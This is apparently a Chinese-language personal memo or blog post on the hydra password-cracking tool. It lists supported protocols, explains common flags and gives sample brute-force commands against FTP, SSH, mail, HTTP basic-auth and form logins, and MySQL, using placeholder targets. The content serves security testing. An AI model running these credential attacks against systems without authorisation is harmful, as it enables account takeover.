hydra

hydra使用

又是一篇水文,RCE是不可能的了,这辈子都不会有RCE的CVE。只能搞low点的东西
hydra可以破解的协议很多,常规的协议,其中还可以破解basic auth,web的NTLM的认证等。

我列举一蛤
Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP
总的来说,我可以分成

HTTP

HTTP(S)-FORM-GET,HTTP(S)-FORM-POST,HTTP(S)-GET, HTTP(S)-HEAD,HTTP-Proxy

DB

PostgreSQL,MySQL,MS-SQL,ORACLE

common

FTP,SSH,Telnet,RDP,VNC,LDAP,SMB

EMAIL

POP3,IMAP,SMTP Enum

burp那边可能需要插件支持,但是暴力破解是一个比较长时间的工作,不断生成字典去跑。
我这里备忘一下。不要老是去找文档。记忆里也不大好,主要是平时也用的少,但是深入发现,没有经过白帽子洗礼的公司,
很多网站和服务都是存在被暴力破解的风险的,没有被破解就是风险,被爆破就是高危漏洞。

就看谁的字典够屌,信息收集够厉害了。

基本参数

1
hydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]

-l 指定用户名
-p 指定密码
-L 指定用户名文本
-P 指定密码文本
-s 指定端口
-t 线程数
-R 继续上一次破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# FTP
hydra -t 1 -l <login-name> -P <wordlist> -vV <target-ip> ftp
hydra -l <login-name> -P <wordlist> ftp://localhost/
# SSH
hydra -l <login-name> -P <wordlist> -s 22 -vV <target-ip> ssh
# IMAP
hydra -l muts -P pass.txt my.pop3.mail pop3
hydra -l muts -P pass.txt my.pop3.mail IMAP
# WEB basic auth
# http
hydra -l <username> -P <wordlist> -t 1 -f -vV <target-ip> http-get <url directory, i.e. />
# https
hydra -s 443 -l <username> -P <wordlist> -t 1 -f -vV <target-ip> https-get <url directory, i.e. />

# http post form
#这里这个bad login是表示失败的标志
hydra -L users.txt -P pass.txt -t 10 -w 30 <target ip> http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -o hydra-http-post-attack.txt
# HTTP NTLM
#outlook会使用这个

# mysql
hydra -L <username> -P <wordlist> <target-ip> mysql

参考链接